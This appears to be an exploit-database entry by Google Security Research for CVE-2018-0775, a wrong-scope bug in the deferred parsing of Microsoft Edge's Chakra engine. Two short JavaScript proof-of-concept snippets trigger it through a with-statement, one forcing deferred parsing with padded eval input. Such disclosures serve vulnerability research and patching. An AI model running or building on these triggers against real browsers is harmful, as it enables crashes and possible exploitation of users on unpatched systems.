Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2)

Author: Google Security Research
type: dos
platform: windows
port: 
date_added: 2018-01-17 
date_updated: 2018-01-17 
verified: 1 
codes: CVE-2018-0775 
tags: 
aliases:  
screenshot_url:  
application_url: 

/*
Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to  issue 1310 .

PoC:
*/

// Enable the flag using '\n'.repeat(0x1000)
eval(`(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());` + '\n'.repeat(0x1000));

PoC 2:
// ./ch poc.js -ForceDeferParse
(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());